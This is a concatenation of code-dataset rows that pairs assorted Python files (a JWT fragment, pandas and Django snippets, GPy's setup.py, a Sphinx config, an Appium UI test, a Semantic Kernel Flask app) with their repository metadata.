if 'kid' in headers:
self._validate_kid(headers['kid'])
def _validate_kid(self, kid):
if not isinstance(kid, string_types):
raise InvalidTokenError('Key ID header parameter must be a string')
_jws_global_obj = PyJWS()
encode = _jws_global_obj.encode
decode = _jws_global_obj.decode
register_algorithm = _jws_global_obj.register_algorithm
unregister_algorithm = _jws_global_obj.unregister_algorithm
get_unverified_header = _jws_global_obj.get_unverified_header
| [
"47265977+Galymbekov@users.noreply.github.com"
] | 47265977+Galymbekov@users.noreply.github.com |
eb6cddd566669ce91d865ba2e42ef6b5cef7277d | 517a904955033092aec11288151d725548226abc | /pandas_tutorial/data_io/to_json.py | a0ffb8e0237c8dd06a3f62e4a2bca9ba237e9763 | [] | no_license | MinSu-Kim/python_tutorial | ae0a4e3570aa4cb411626cefbc031777364764d5 | ed0c08892822d7054161c9e8f98841370868e82d | refs/heads/master | 2021-06-16T16:15:30.349719 | 2021-05-26T04:59:47 | 2021-05-26T04:59:47 | 207,266,202 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | import pandas as pd
# 판다스 DataFrame() 함수로 데이터프레임 변환. 변수 df에 저장
data = {'name': ['Jerry', 'Riah', 'Paul'],
'algol': ["A", "A+", "B"],
'basic': ["C", "B", "B+"],
'c++': ["B+", "C", "C+"],
}
df = pd.DataFrame(data)
df.set_index('name', inplace=True) # name 열을 인덱스로 지정
print(df)
print("# to_json() 메소드를 사용하여 JSON 파일로 내보내기. 파열명은 df_sample.json로 저장")
df.to_json("./df_sample.json")
| [
"net94.teacher@gmail.com"
] | net94.teacher@gmail.com |
fa10145e9aa1763d721507e88caccee956b9b069 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_snag.py | 346b4d7003fc041b6b0c9bffbf125482ebf69e9b | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py |
#calss header
class _SNAG():
def __init__(self,):
self.name = "SNAG"
self.definitions = [u'a problem, difficulty, or disadvantage: ', u'a tear, hole, or loose thread in a piece of clothing or cloth caused by a sharp or rough object: ', u'informal for sausage ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
992ef5c5a51c47b4863fce8bcfdfbd2c973bb95d | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r9/Gen/DecFiles/options/14103050.py | 600b4f3f3becc10dbe313d0fbf4ba87e67483ba9 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r9/Gen/DecFiles/options/14103050.py generated: Fri, 27 Mar 2015 16:10:10
#
# Event Type: 14103050
#
# ASCII decay Descriptor: [B_c+ -> (B0 -> K+ K-) pi+]cc
#
from Configurables import Generation
Generation().EventType = 14103050
Generation().SampleGenerationTool = "Special"
from Configurables import Special
Generation().addTool( Special )
Generation().Special.ProductionTool = "BcVegPyProduction"
Generation().PileUpTool = "FixedLuminosityForRareProcess"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bc_Bdpi+,KK=BcVegPy,DecProdCut.dec"
Generation().Special.CutTool = "BcDaughtersInLHCb"
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
1626fb780031dc410b6a61f8a143c903187cca5f | 3922e9b41bf8bf5dd0a0d9abc8852d147a02db0f | /articles/build/lib.linux-i686-2.7/migrations/0007_article_details_time.py | 9db06b6092089d394cf6015df2b0f59025538157 | [] | no_license | levi-p/market | 3ddd0ca20818139c96fa102256f21249d85f104f | 5deb8dbf83ddeb07415bd21703b57f3c3d54aa54 | refs/heads/master | 2020-07-10T18:03:30.316598 | 2017-01-20T15:00:39 | 2017-01-20T15:00:39 | 67,126,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 517 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-08-22 16:14
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0006_auto_20160808_1530'),
]
operations = [
migrations.AddField(
model_name='article_details',
name='time',
field=models.DateField(default=datetime.datetime(2016, 8, 22, 16, 14, 20, 530291)),
),
]
| [
"levipda@gmail.com"
] | levipda@gmail.com |
3d80d6041c56250f6eb099cbf6605149393ecf7f | c7386a7a7aafabe9feb8368c42b607cff70dcfe7 | /GPy-devel/setup.py | 2f1dc25f90eaa53cea5e489880498d0ae4ee1b51 | [
"BSD-3-Clause"
] | permissive | dechamoungsri/Prosody_modeling | 8f3d603af6c54786cb048186bab65cfcd5b441f1 | 7895a032dde1c2c34cf42b7c362ca2b61ada0f37 | refs/heads/master | 2021-08-31T02:32:42.813986 | 2017-12-20T06:42:36 | 2017-12-20T06:42:36 | 114,848,055 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,878 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#===============================================================================
# Copyright (c) 2012 - 2014, GPy authors (see AUTHORS.txt).
# Copyright (c) 2014, James Hensman, Max Zwiessele
# Copyright (c) 2015, Max Zwiessele
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of GPy nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
from __future__ import print_function
import os
import sys
from setuptools import setup, Extension
import numpy as np
import codecs
def read(fname):
with codecs.open(fname, 'r', 'latin') as f:
return f.read()
def read_to_rst(fname):
try:
import pypandoc
rstname = "{}.{}".format(os.path.splitext(fname)[0], 'rst')
pypandoc.convert(read(fname), 'rst', format='md', outputfile=rstname)
with open(rstname, 'r') as f:
rststr = f.read()
return rststr
#return read(rstname)
except ImportError:
return read(fname)
desc = """
Please refer to the github homepage for detailed instructions on installation and usage.
"""
version_dummy = {}
exec(read('GPy/__version__.py'), version_dummy)
__version__ = version_dummy['__version__']
del version_dummy
#Mac OS X Clang doesn't support OpenMP at the current time.
#This detects if we are building on a Mac
def ismac():
return sys.platform[:6] == 'darwin'
if ismac():
compile_flags = [ '-O3', ]
link_args = []
else:
compile_flags = [ '-fopenmp', '-O3']
link_args = ['-lgomp' ]
ext_mods = [Extension(name='GPy.kern.src.stationary_cython',
sources=['GPy/kern/src/stationary_cython.c',
'GPy/kern/src/stationary_utils.c'],
include_dirs=[np.get_include(),'.'],
extra_compile_args=compile_flags,
extra_link_args = link_args),
Extension(name='GPy.util.choleskies_cython',
sources=['GPy/util/choleskies_cython.c'],
include_dirs=[np.get_include(),'.'],
extra_link_args = link_args,
extra_compile_args=compile_flags),
Extension(name='GPy.util.linalg_cython',
sources=['GPy/util/linalg_cython.c'],
include_dirs=[np.get_include(),'.'],
extra_compile_args=compile_flags),
Extension(name='GPy.kern.src.coregionalize_cython',
sources=['GPy/kern/src/coregionalize_cython.c'],
include_dirs=[np.get_include(),'.'],
extra_compile_args=compile_flags),
Extension(name='GPy.models.state_space_cython',
sources=['GPy/models/state_space_cython.c'],
include_dirs=[np.get_include(),'.'],
extra_compile_args=compile_flags)]
setup(name = 'GPy',
version = __version__,
author = read_to_rst('AUTHORS.txt'),
author_email = "gpy.authors@gmail.com",
description = ("The Gaussian Process Toolbox"),
long_description = desc,
license = "BSD 3-clause",
keywords = "machine-learning gaussian-processes kernels",
url = "http://sheffieldml.github.com/GPy/",
download_url='https://github.com/SheffieldML/GPy/',
ext_modules = ext_mods,
packages = ["GPy",
"GPy.core",
"GPy.core.parameterization",
"GPy.kern",
"GPy.kern.src",
"GPy.kern.src.psi_comp",
"GPy.models",
"GPy.inference",
"GPy.inference.optimization",
"GPy.inference.mcmc",
"GPy.inference.latent_function_inference",
"GPy.likelihoods",
"GPy.mappings",
"GPy.examples",
"GPy.testing",
"GPy.util",
"GPy.plotting",
"GPy.plotting.gpy_plot",
"GPy.plotting.matplot_dep",
"GPy.plotting.matplot_dep.controllers",
"GPy.plotting.plotly_dep",
],
package_dir={'GPy': 'GPy'},
#package_data = {'GPy': ['defaults.cfg', 'installation.cfg',
# 'util/data_resources.json',
# 'util/football_teams.json',
# 'testing/plotting_tests/baseline/*.png'
# ]},
#data_files=[('GPy/testing/plotting_tests/baseline', 'testing/plotting_tests/baseline/*.png'),
# ('GPy/testing/', 'GPy/testing/pickle_test.pickle'),
# ],
include_package_data = True,
py_modules = ['GPy.__init__'],
test_suite = 'GPy.testing',
install_requires = ['numpy>=1.7', 'scipy>=0.16', 'six', 'paramz>=0.6.9'],
extras_require = {'docs':['sphinx'],
'optional':['mpi4py',
'ipython>=4.0.0',
],
'plotting':['matplotlib >= 1.3',
'plotly >= 1.8.6'],
'notebook':['jupyter_client >= 4.0.6',
'ipywidgets >= 4.0.3',
'ipykernel >= 4.1.0',
'notebook >= 4.0.5',
],
},
classifiers=['License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
]
)
# Check config files and settings:
local_file = os.path.abspath(os.path.join(os.path.dirname(__file__), 'GPy', 'installation.cfg'))
home = os.getenv('HOME') or os.getenv('USERPROFILE')
user_file = os.path.join(home,'.config', 'GPy', 'user.cfg')
print("")
try:
if not os.path.exists(user_file):
# Does an old config exist?
old_user_file = os.path.join(home,'.gpy_user.cfg')
if os.path.exists(old_user_file):
# Move it to new location:
print("GPy: Found old config file, moving to new location {}".format(user_file))
if not os.path.exists(os.path.dirname(user_file)):
os.makedirs(os.path.dirname(user_file))
os.rename(old_user_file, user_file)
else:
# No config file exists, save informative stub to user config folder:
print("GPy: Saving user configuration file to {}".format(user_file))
if not os.path.exists(os.path.dirname(user_file)):
os.makedirs(os.path.dirname(user_file))
with open(user_file, 'w') as f:
with open(local_file, 'r') as l:
tmp = l.read()
f.write(tmp)
else:
print("GPy: User configuration file at location {}".format(user_file))
except:
print("GPy: Could not write user configuration file {}".format(user_file))
| [
"mamegomaday@gmail.com"
] | mamegomaday@gmail.com |
386e9f87de2b8a14c1f22d2e81b9b26ff7240681 | e76fda1fba459456c4bc105e7a6dcc6277a1a26c | /a_bite_of_python/20-keyword_only.py | e71eba82c6f9c7dd4676247a610cbae522e006aa | [] | no_license | lafabo/i-love-tutorials | 6bb2a684a201975ab523d9721b02761a6269853c | eafcd47fd62e770107c7e1f08e0d6d60a539f1ec | refs/heads/master | 2021-01-21T04:46:56.365199 | 2016-07-20T17:38:03 | 2016-07-20T17:38:03 | 47,709,568 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | def total(initial=5, *numbers, extra_number):
count = initial
for number in numbers:
count += number
count += extra_number
print(count)
total(10, 1, 2, 3, extra_number=50)
total(10, 1, 2 ,3)
| [
"lazyfatboy@ya.ru"
] | lazyfatboy@ya.ru |
528f2d2fd54dc7fe09e75f50c0c94d71c27c51db | 505f1c36d931d4388a0a4f8c57fbd8bd9ab4d821 | /ImageAnalysis/ImageAnalysis/python/docs/conf.py | 4bd685e97dd796c81348cf542b1c3ba2c06100fd | [
"MIT"
] | permissive | mikebourbeauart/perler-printer | 9e43a51b82cb9b08d35c81e680ea7ef2624fda2e | 8c5023de6bb9b3cbe2bc28c1c823030dfd708db4 | refs/heads/master | 2022-12-01T18:46:37.632443 | 2020-05-04T00:41:11 | 2020-05-04T00:41:11 | 98,070,537 | 0 | 1 | MIT | 2022-11-22T05:58:34 | 2017-07-23T02:49:35 | Python | UTF-8 | Python | false | false | 5,452 | py | # -*- coding: utf-8 -*-
#
# Perler Printer documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 09 14:05:44 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
#sys.path.insert(0, os.path.abspath('../source'))
#sys.path.insert(0, os.path.abspath('../source/arduino-comms'))
#sys.path.insert(0, os.path.abspath('../source/image-parsing'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.todo']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Perler Printer'
copyright = u'2017, Mike Bourbeau'
author = u'Mike Bourbeau'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'about.html',
'navigation.html',
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
'donate.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'PerlerPrinterdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PerlerPrinter.tex', u'Perler Printer Documentation',
u'Mike Bourbeau', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'perlerprinter', u'Perler Printer Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PerlerPrinter', u'Perler Printer Documentation',
author, 'PerlerPrinter', 'One line description of project.',
'Miscellaneous'),
]
| [
"borbs727@gmail.com"
] | borbs727@gmail.com |
c0ca7088e2f0c17f756d8e622ffba7be75a25e7d | a2e673ba5797c242af20821075d76e84113d9503 | /Capitulo 2/Capitulo2-Decisoes.py | f55b8678aac544b2a5f1b22568957305bbdef20a | [] | no_license | Elvis-Lopes/Python-Fiap | ac0a09f44c67b9106a607b7e8082ce0248000316 | 1c10015155f84c8ddee5c8dbd7b21712741e1d1c | refs/heads/master | 2023-06-02T04:37:54.723196 | 2021-06-23T20:37:56 | 2021-06-23T20:37:56 | 377,885,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | nome = input("Digite o nome: ")
idade = int(input("Digite a idade: "))
prioridade = "Não"
if idade >= 65:
prioridade = "Sim"
print(f'paciente: {nome}\n'
f'Idade: {idade} anos\n'
f'Prioridade: {prioridade}')
else:
print(f'paciente: {nome}\n'
f'Idade: {idade} anos\n'
f'Prioridade: {prioridade}') | [
"elvislopes1996@hotmail.com"
] | elvislopes1996@hotmail.com |
8823445b94c9ad0e843e1f5cf51ff814a3180a57 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/amme/testcase/firstcases/testcase6_025.py | 874c6af813752507bf19190adc33729e91e453ef | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,763 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'com.money.manager.ex',
'appActivity' : 'com.money.manager.ex.home.MainActivity',
'resetKeyboard' : True,
'androidCoverage' : 'com.money.manager.ex/com.money.manager.ex.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase025
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememtBack(driver, "new UiSelector().text(\"$ 0.00\")", "new UiSelector().className(\"android.widget.TextView\").instance(7)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menu_period\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/radio\").className(\"android.widget.RadioButton\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionFilters\").className(\"android.widget.TextView\")")
TouchAction(driver).long_press(element).release().perform()
element = getElememt(driver, "new UiSelector().className(\"android.widget.ImageButton\").description(\"Open\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/fab\").className(\"android.widget.ImageButton\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(4)
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionStatusSelector\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/checkbox\").className(\"android.widget.CheckBox\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionStatusSelector\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/checkbox\").className(\"android.widget.CheckBox\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().className(\"android.widget.ImageButton\").description(\"Open\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/fab\").className(\"android.widget.ImageButton\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Donate\")", "new UiSelector().className(\"android.widget.Button\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(4)
driver.press_keycode(4)
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).long_press(element).release().perform()
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(82)
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"6_025\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'com.money.manager.ex'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"prefest2018@gmail.com"
] | prefest2018@gmail.com |
2670acdaad0515f6c6a13dbfbff6a59c8b062e01 | 500bca3e22bd0c30c79b74918e9847742b3c428e | /sdk/python/endpoints/online/llm/src/sk/app.py | 6c4efd2ff36aeba32c63d59cd924d39133854683 | [
"MIT"
] | permissive | Azure/azureml-examples | 2304c862fd2e36e6640ecc4d09f69c5ed93b48ab | e5f7b247d4753f115a8f7da30cbe25294f71f9d7 | refs/heads/main | 2023-08-31T00:10:14.107509 | 2023-08-30T17:29:22 | 2023-08-30T17:29:22 | 289,334,021 | 1,219 | 1,074 | MIT | 2023-09-14T16:00:55 | 2020-08-21T18:04:26 | Jupyter Notebook | UTF-8 | Python | false | false | 4,917 | py | from __future__ import annotations
import sys, os, json
from flask import Flask, request
import semantic_kernel as sk
import semantic_kernel.connectors.ai.open_ai as sk_oai
from semantic_kernel.planning.basic_planner import BasicPlanner
from semantic_kernel.planning.plan import Plan
from azure.identity import DefaultAzureCredential, AzureCliCredential
# add parent directory to path
sys.path.insert(0, str(os.path.abspath(os.path.join(os.path.dirname(__file__), "../"))))
import utils
openai_config: utils.OpenAIConfig = None
IS_CHAT_COMPLETION = None
import importlib
importlib.reload(utils)
# set to true for chat completion API, false for text completion
IS_CHAT_COMPLETION = True
credential = DefaultAzureCredential(additionally_allowed_tenants=["*"])
def init() -> tuple[sk.Kernel, BasicPlanner]:
utils.load_secrets(credential)
load_env_vars()
kernel = create_kernel(debug=False)
planner = BasicPlanner()
return kernel, planner
def load_env_vars():
global openai_config
openai_config = utils.OpenAIConfig.from_env()
global IS_CHAT_COMPLETION
IS_CHAT_COMPLETION = bool(os.environ.get("IS_CHAT_COMPLETION"))
def import_skills(kernel: sk.Kernel, skills_folder: str):
print(f"Importing skills from {skills_folder}")
for skill_name in os.listdir(skills_folder):
skill_full_path = os.path.join(skills_folder, skill_name)
print(f"== Importing skill {skill_name}: {skill_full_path}")
kernel.import_semantic_skill_from_directory(skills_folder, skill_name)
def create_kernel(debug: bool = False) -> sk.Kernel:
logger = sk.NullLogger()
if debug:
import logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s"
)
handler.setFormatter(formatter)
logger.handlers.clear()
logger.addHandler(handler)
kernel = sk.Kernel()
if openai_config.OPENAI_API_TYPE == "azure":
# if using chat service from Azure OpenAI API, use AzureChatCompletion
kernel.add_text_completion_service(
"completion",
sk_oai.AzureChatCompletion(
deployment_name=openai_config.AZURE_OPENAI_API_DEPLOYMENT_NAME,
api_key=openai_config.OPENAI_API_KEY,
endpoint=openai_config.AZURE_OPENAI_API_ENDPOINT,
)
if IS_CHAT_COMPLETION
else sk_oai.AzureTextCompletion(
deployment_name=openai_config.AZURE_OPENAI_API_DEPLOYMENT_NAME,
api_key=openai_config.OPENAI_API_KEY,
endpoint=openai_config.AZURE_OPENAI_API_ENDPOINT,
),
)
else:
print(
"using openai", openai_config.OPENAI_MODEL_ID, openai_config.OPENAI_ORG_ID
)
kernel.add_text_completion_service(
"completion",
sk_oai.OpenAIChatCompletion(
openai_config.OPENAI_MODEL_ID,
openai_config.OPENAI_API_KEY,
openai_config.OPENAI_ORG_ID,
)
if IS_CHAT_COMPLETION
else sk_oai.OpenAITextCompletion(
openai_config.OPENAI_MODEL_ID,
openai_config.OPENAI_API_KEY,
openai_config.OPENAI_ORG_ID,
),
)
# import skills from skills folder
import_skills(
kernel, os.path.join(os.path.dirname(os.path.realpath(__file__)), "skills")
)
return kernel
kernel, planner = init()
async def invoke_skill(skillName, functionName, context):
skillFunction = kernel.func(skillName, functionName)
return await skillFunction.invoke_async(context=context)
# class for plan deserializing
class GeneratedPlan:
def __init__(self, result: str):
self.result = result
app = Flask(__name__)
@app.route("/", methods=["GET"])
def home():
return "ok"
@app.route("/health", methods=["GET"])
def health():
return "healthy"
@app.route("/skills/<skillName>/invoke/<functionName>", methods=["POST"])
async def invoke(skillName, functionName):
return await invoke_skill(skillName, functionName, request.get_json())
@app.route("/planner/createplan", methods=["POST"])
async def createplan():
body = request.get_json()
goal = body["value"]
plan = await planner.create_plan_async(goal, kernel)
print(plan.generated_plan.result)
return plan.generated_plan.result
@app.route("/planner/executeplan", methods=["POST"])
async def executeplan():
body = request.get_json()
print(body)
gp = GeneratedPlan(result=json.dumps(body))
p = Plan(goal=None, prompt=None, plan=gp)
result = await planner.execute_plan_async(p, kernel)
print(result)
return result
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5001)
| [
"noreply@github.com"
] | Azure.noreply@github.com |
415bc40d799acf97c2acf3a2e6cdcadc3d2ab377 | fdb5c8d71839ad15c7942d1367972524d2243573 | /sciwing/infer/seq_label_inference/seq_label_inference.py | 54a7ad00f66c41a732e0b26e794539a37bbfedf5 | [
"MIT"
] | permissive | abhinavkashyap/sciwing | b752b779053a2444f64bcdbc64e2bdc6a0d55ed6 | 1c061b99a35a9d8b565d9762aaaf5db979b50112 | refs/heads/master | 2023-05-12T16:00:08.210458 | 2022-03-25T01:19:00 | 2022-03-25T01:19:00 | 187,997,438 | 58 | 11 | MIT | 2023-05-01T21:26:41 | 2019-05-22T08:36:14 | Python | UTF-8 | Python | false | false | 15,664 | py | import torch.nn as nn
from typing import Optional, Union, Dict, Any, List
import torch
from sciwing.data.datasets_manager import DatasetsManager
from sciwing.data.line import Line
from sciwing.data.seq_label import SeqLabel
from sciwing.infer.seq_label_inference.BaseSeqLabelInference import (
BaseSeqLabelInference,
)
from sciwing.utils.science_ie_data_utils import ScienceIEDataUtils
import wasabi
from sciwing.metrics.token_cls_accuracy import TokenClassificationAccuracy
